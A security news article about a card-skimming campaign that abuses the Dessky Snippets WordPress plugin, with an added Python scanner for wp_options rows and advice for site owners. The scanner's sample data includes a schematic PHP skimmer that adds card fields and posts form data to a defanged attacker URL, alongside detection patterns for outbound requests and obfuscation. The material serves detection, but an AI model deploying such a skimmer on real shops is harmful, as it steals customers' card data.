Researchers at Sucuri have recently discovered a malicious campaign in which attackers abuse a lesser-known WordPress plugin to steal credit card data from unsuspecting e-commerce websites.
The plugin, Dessky Snippets, is designed to let site administrators add custom PHP code to their sites. Attackers have been using that same feature to plant malware that skims credit card data on affected sites. The plugin is not being exploited through a vulnerability of its own; its legitimate ability to run arbitrary PHP is what makes it useful to an attacker who already controls the site.
Malicious Code Injection on E-Commerce Platforms
“This malicious code was saved in the dnsp_settings option in the WordPress wp_options table and was designed to modify the checkout process in WooCommerce by manipulating the billing form and injecting its own code,” according to Ben Martin.
The malware adds extra fields to the WooCommerce billing form that ask shoppers for sensitive details: name, address, credit card number, expiration date, and CVV code. Once entered, this data is sent in the background to an attacker-controlled server at the (defanged) URL “hxxps://2of[.]cc/wp-content/.” WooCommerce's stock billing form never asks for card details, which are handled by the payment gateway, so fields like these on the billing step are themselves a red flag.
One of the more cunning features of this attack is that autocomplete is disabled on the fraudulent billing fields (their autocomplete attribute is set to off). This makes the malicious fields look like normal, required inputs and less likely to raise alarms among users.
“By manually disabling this feature on the fake checkout form it reduces the likelihood that the browser will warn the user that sensitive information is being entered, and ensures that the fields stay blank until manually filled out by the user, reducing suspicion and making the fields appear as regular, necessary inputs for the transaction,” Martin further stated.
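As an added example (not Sucuri's code or anything from the report), the following Python script applies the indicators described above to rows exported from wp_options: it flags a row that hooks the WooCommerce checkout, adds card-data fields with autocomplete turned off, and sends data off-site, and it pulls out any URL for blocking. The sample rows, the benign `custom_checkout_tweak` option and the schematic "malicious" snippet are constructed stand-ins, not the real skimmer; only the `dnsp_settings` option name and the defanged URL come from the report.

```python
"""Scan exported wp_options rows for code-snippet payloads that tamper with the
WooCommerce checkout. Indicators follow the published description: the payload
lives in an option row (dnsp_settings for Dessky Snippets), hooks the billing
form, adds card-data fields with autocomplete disabled, and posts the data to an
attacker-controlled URL."""
import re
from typing import Dict, List, Tuple

# Option names used by code-snippet plugins to store PHP. dnsp_settings is the
# one named in the Sucuri report; add others you know of for your own site.
SNIPPET_OPTION_NAMES = {"dnsp_settings"}

# (indicator name, regex) pairs matched against the raw option_value text, so
# they work on plain and PHP-serialized values alike.
INDICATORS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("checkout_hook", re.compile(
        r"woocommerce_(?:billing|checkout|shipping)_fields|woocommerce_checkout_process", re.I)),
    ("card_fields", re.compile(
        r"(?:cc|card|credit)[_\- ]?(?:number|num|no|cvv|cvc|exp\w*)|\bcv[vc]\b", re.I)),
    ("autocomplete_off", re.compile(r"autocomplete\W{1,8}off", re.I)),
    ("outbound_request", re.compile(
        r"wp_remote_(?:post|request|get)|curl_(?:init|exec)|fsockopen"
        r"|file_get_contents\s*\(\s*['\"]\s*(?:hxxps?|https?)://", re.I)),
    ("obfuscation", re.compile(
        r"base64_decode|eval\s*\(|gzinflate|gzuncompress|str_rot13|create_function", re.I)),
]

URL_RE = re.compile(r"(?:hxxps?|https?)://[^\s'\"]+", re.I)


def scan_option(option_name: str, option_value: str) -> List[str]:
    """Return the indicator names that fire for one wp_options row, in INDICATORS order."""
    hits = [name for name, pattern in INDICATORS if pattern.search(option_value)]
    if option_name in SNIPPET_OPTION_NAMES and hits:
        hits.insert(0, "snippet_plugin_option")
    return hits


def is_suspicious(hits: List[str]) -> bool:
    """Suspicious when the code touches the checkout form and either collects
    card data or sends data off-site; obfuscated code inside a snippet-plugin
    option is also enough to warrant a manual read."""
    touches_checkout = "checkout_hook" in hits
    skims = "card_fields" in hits or "outbound_request" in hits
    obfuscated_snippet = "snippet_plugin_option" in hits and "obfuscation" in hits
    return (touches_checkout and skims) or obfuscated_snippet


def extract_urls(option_value: str) -> List[str]:
    """Pull out every URL in the row so it can be blocked and searched for elsewhere."""
    return URL_RE.findall(option_value)


def find_suspicious(rows: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Map option_name -> fired indicators for every row that is_suspicious()."""
    report: Dict[str, List[str]] = {}
    for option_name, option_value in rows:
        hits = scan_option(option_name, option_value)
        if is_suspicious(hits):
            report[option_name] = hits
    return report


# Constructed sample rows (not data from a real site). The dnsp_settings value is
# a schematic stand-in for the behaviour described in the report, not the actual
# skimmer; the URL is kept defanged.
SAMPLE_ROWS: List[Tuple[str, str]] = [
    ("siteurl", "https://shop.example"),
    ("dnsp_settings",
     "add_filter('woocommerce_billing_fields', function ($fields) {"
     "  $fields['billing_cc_number'] = array('label' => 'Card number', 'autocomplete' => 'off', 'required' => true);"
     "  $fields['billing_cc_cvv'] = array('label' => 'CVV', 'autocomplete' => 'off', 'required' => true);"
     "  return $fields; });"
     "add_action('woocommerce_checkout_process', function () {"
     "  wp_remote_post('hxxps://2of[.]cc/wp-content/', array('body' => $_POST)); });"),
    ("woocommerce_checkout_page_id", "8"),
    # Benign (hypothetical) snippet: touches the checkout but only relabels a field.
    ("custom_checkout_tweak",
     "add_filter('woocommerce_checkout_fields', function ($f) {"
     "  $f['billing']['billing_phone']['label'] = 'Mobile'; return $f; });"),
]

if __name__ == "__main__":
    for name, hits in find_suspicious(SAMPLE_ROWS).items():
        value = dict(SAMPLE_ROWS)[name]
        print(f"{name}: {', '.join(hits)}; urls={extract_urls(value)}")
```

Feed it real rows with `wp option get dnsp_settings` or a `SELECT option_name, option_value FROM wp_options` dump. The heuristic is deliberately loose, so treat a hit as a row to read in full rather than as proof of compromise, and remember that a cleaned row can be re-planted by whoever still holds the admin credentials that installed the snippet.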
Repeated Misuse of WordPress Plugins
This incident is not an isolated case. Only last month, Sucuri uncovered another abuse of a legitimate plugin, WPCode, in which attackers injected malicious JavaScript that redirected visitors to harmful domains.
The Sign1 malware campaign used the same strategy, affecting more than 39,000 WordPress sites in six months through the Simple Custom CSS and JS plugin. The common thread is that any plugin built to run custom code becomes a convenient, persistent foothold once an attacker can reach its settings.
Preventative Measures for Website Owners
To maintain the security of e-commerce platforms and safeguard sensitive customer information, website owners are recommended to:
- Ensure all website components and plugins are regularly updated to the latest versions, as updates often include security patches that protect against known vulnerabilities.
- Use long, unique passwords for every WordPress account, above all administrators, to resist brute-force and credential-stuffing attacks. Adding PHP through a snippet plugin requires administrator rights, so a compromised admin account is what makes this kind of injection possible.
- Schedule and conduct comprehensive security audits of your website frequently. Look for malware, unauthorized modifications, and unexpected plugins, and review the stored settings of any code-snippet plugin (in this campaign the dnsp_settings row of the wp_options table) for code you did not add.
- Monitor the site for change: file integrity, plugin installs and updates, administrator logins, and edits to wp_options. This helps you detect and respond to unusual behavior quickly.